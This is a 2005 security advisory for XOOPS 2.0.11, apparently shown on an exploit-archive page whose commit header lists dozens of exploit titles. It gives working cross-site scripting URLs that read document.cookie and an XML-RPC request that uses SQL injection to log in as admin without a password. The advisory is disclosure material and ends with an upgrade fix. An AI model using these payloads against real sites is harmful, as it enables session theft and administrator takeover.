bfebc3fa5a
62 changes to exploits/shellcodes macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability' Peercast < 0.1211 - Format String Trillian Pro < 2.01 - Design Error dbPowerAmp < 2.0/10.0 - Buffer Overflow PsychoStats < 2.2.4 Beta - Cross Site Scripting MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution GitStack 2.3.10 - Unauthenticated Remote Code Execution Invision Power Top Site List < 2.0 Alpha 3 - SQL Injection (PoC) Invision Power Board (IP.Board) < 2.0 Alpha 3 - SQL Injection (PoC) Aardvark Topsites < 4.1.0 - Multiple Vulnerabilities DUWare Multiple Products - Multiple Vulnerabilities AutoRank PHP < 2.0.4 - SQL Injection (PoC) ASPapp Multiple Products - Multiple Vulnerabilities osCommerce < 2.2-MS2 - Multiple Vulnerabilities PostNuke < 0.726 Phoenix - Multiple Vulnerabilities MetaDot < 5.6.5.4b5 - Multiple Vulnerabilities phpGedView < 2.65 beta 5 - Multiple Vulnerabilities phpShop < 0.6.1-b - Multiple Vulnerabilities Invision Power Board (IP.Board) < 1.3 - SQL Injection phpBB < 2.0.6d - Cross Site Scripting Phorum < 5.0.3 Beta - Cross Site Scripting vBulletin < 3.0.0 RC4 - Cross Site Scripting Mambo < 4.5 - Multiple Vulnerabilities phpBB < 2.0.7a - Multiple Vulnerabilities Invision Power Top Site List < 1.1 RC 2 - SQL Injection Invision Gallery < 1.0.1 - SQL Injection PhotoPost < 4.6 - Multiple Vulnerabilities TikiWiki < 1.8.1 - Multiple Vulnerabilities phpBugTracker < 0.9.1 - Multiple Vulnerabilities OpenBB < 1.0.6 - Multiple Vulnerabilities PHPX < 3.26 - Multiple Vulnerabilities Invision Power Board (IP.Board) < 1.3.1 - Design Error HelpCenter Live! < 1.2.7 - Multiple Vulnerabilities LiveWorld Multiple Products - Cross Site Scripting WHM.AutoPilot < 2.4.6.5 - Multiple Vulnerabilities PHP-Calendar < 0.10.1 - Arbitrary File Inclusion PhotoPost Classifieds < 2.01 - Multiple Vulnerabilities ReviewPost < 2.84 - Multiple Vulnerabilities PhotoPost < 4.85 - Multiple Vulnerabilities AZBB < 1.0.07d - Multiple Vulnerabilities Invision Power Board (IP.Board) < 2.0.3 - Multiple Vulnerabilities Burning Board < 2.3.1 - SQL Injection XOOPS < 2.0.11 - Multiple Vulnerabilities PEAR XML_RPC < 1.3.0 - Remote Code Execution PHPXMLRPC < 1.1 - Remote Code Execution SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Overwrite XPCOM - Race Condition ADOdb < 4.71 - Cross Site Scripting Geeklog < 1.4.0 - Multiple Vulnerabilities PEAR LiveUser < 0.16.8 - Arbitrary File Access Mambo < 4.5.3h - Multiple Vulnerabilities phpRPC < 0.7 - Remote Code Execution Gallery 2 < 2.0.2 - Multiple Vulnerabilities PHPLib < 7.4 - SQL Injection SquirrelMail < 1.4.7 - Arbitrary Variable Overwrite CubeCart < 3.0.12 - Multiple Vulnerabilities Claroline < 1.7.7 - Arbitrary File Inclusion X-Cart < 4.1.3 - Arbitrary Variable Overwrite Mambo < 4.5.4 - SQL Injection Synology Photostation < 6.7.2-3429 - Multiple Vulnerabilities D-Link DNS-343 ShareCenter < 1.05 - Command Injection D-Link DNS-325 ShareCenter < 1.05B03 - Multiple Vulnerabilities Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)
88 lines
No EOL
3.9 KiB
Text
88 lines
No EOL
3.9 KiB
Text
XOOPS Multiple Vulnerabilities
|
|
|
|
Vendor: XOOPS
|
|
Product: XOOPS
|
|
Version: <= 2.0.11
|
|
Website: http://www.xoops.org/
|
|
|
|
BID: 14094 14096
|
|
CVE: CVE-2005-2112 CVE-2005-2113
|
|
OSVDB: 17633 17634 17635
|
|
SECUNIA: 15843
|
|
PACKETSTORM: 38372
|
|
|
|
Description:
|
|
XOOPS is a very popular dynamic web content management system written in Object Oriented PHP. One of the features of XOOPS is it's own XMLRPC server that handles incoming XMLRPC requests. This particular feature is vulnerable to a highly critical SQL Injection issue. Additionally there are several cross site scripting issues in XOOPS as well which could allow for theft of user data or client side code execution in the context of the victim's web browser.
|
|
|
|
|
|
Cross Site Scripting:
|
|
There are a number of cross site scripting issues in the XOOPS content management software.
|
|
|
|
http://xoops/modules/newbb/edit.php?forum=1&topic_id=1&viewmode=flat&order=
|
|
ASC%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/script%3E&post_id=1
|
|
|
|
http://xoops/modules/repository/comment_edit.php?com_itemid=1&com_order=0&com
|
|
_mode=flat&cid=1&cid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
|
%3C/script%3E&com_id=1
|
|
|
|
These vulnerabilities can be used to render hostile code in the context of the victims browser, and in turn disclose sensitive information to an attacker.
|
|
|
|
|
|
SQL Injection:
|
|
As I mentioned earlier XOOPS comes with it's own XMLRPC server which is enabled by default and is named xmlrpc.php The problem with XMLRPC in xoops is lack of sanitation, but because the data is recieved from the reserved $HTTP_RAW_POST_DATA variable magic_quotes_gpc are never applied! This is a big problem and makes every allowable RPC method in the XOOPS XMLRPC server vulnerable to SQL injection. Why? Well, the main reason is this. This code is from the bloggerapi.php file that handles all incoming blogger XMLRPC requests.
|
|
|
|
function getUserInfo()
|
|
{
|
|
if (!$this->_checkUser($this->params[1], $this->params[2])) {
|
|
$this->response->add(new XoopsXmlRpcFault(104));
|
|
} else {
|
|
$struct = new XoopsXmlRpcStruct();
|
|
$struct->add('nickname', new XoopsXmlRpcString($this->user->getVar('uname')));
|
|
$struct->add('userid', new XoopsXmlRpcString($this->user->getVar('uid')));
|
|
$struct->add('url', new XoopsXmlRpcString($this->user->getVar('url')));
|
|
$struct->add('email', new XoopsXmlRpcString($this->user->getVar('email')));
|
|
$struct->add('lastname', new XoopsXmlRpcString(''));
|
|
$struct->add('firstname', new XoopsXmlRpcString($this->user->getVar('name')));
|
|
$this->response->add($struct);
|
|
}
|
|
}
|
|
|
|
|
|
the _checkUser function is really just a wrapper for the XMLRPC server, as the arguments are eventually passed to the XOOPS core function "loginUser()" which is where the real problem happens. Below is a sample xml file that when sent to the server will influence the query.
|
|
|
|
<?xml version="1.0"?>
|
|
<methodCall>
|
|
<methodName>blogger.getPost</methodName>
|
|
<params>
|
|
<param>
|
|
<value><string></string></value>
|
|
</param>
|
|
<param>
|
|
<value><string></string></value>
|
|
</param>
|
|
<param>
|
|
<value><string>admin')/*</string></value>
|
|
</param>
|
|
<param>
|
|
<value><string>passwordfield</string></value>
|
|
</param>
|
|
<param>
|
|
<value><string></string></value>
|
|
</param>
|
|
</params>
|
|
</methodCall>
|
|
|
|
|
|
This example would authenticate you in as admin and then execute the blogger.getPost method call. An attacker could use this vulnerability to easily gain the administrator hash, and much more.
|
|
|
|
|
|
Solution:
|
|
A new version of XOOPS has been released, and users should upgrade as soon as possible.
|
|
|
|
http://www.xoops.org/modules/news/article.php?storyid=2383
|
|
|
|
Special thanks to Jan Pederson from XOOPS for acting so quickly on this very high risk issue. Very prompt, very professional!
|
|
|
|
|
|
Credits:
|
|
James Bercegay of the GulfTech Security Research Team |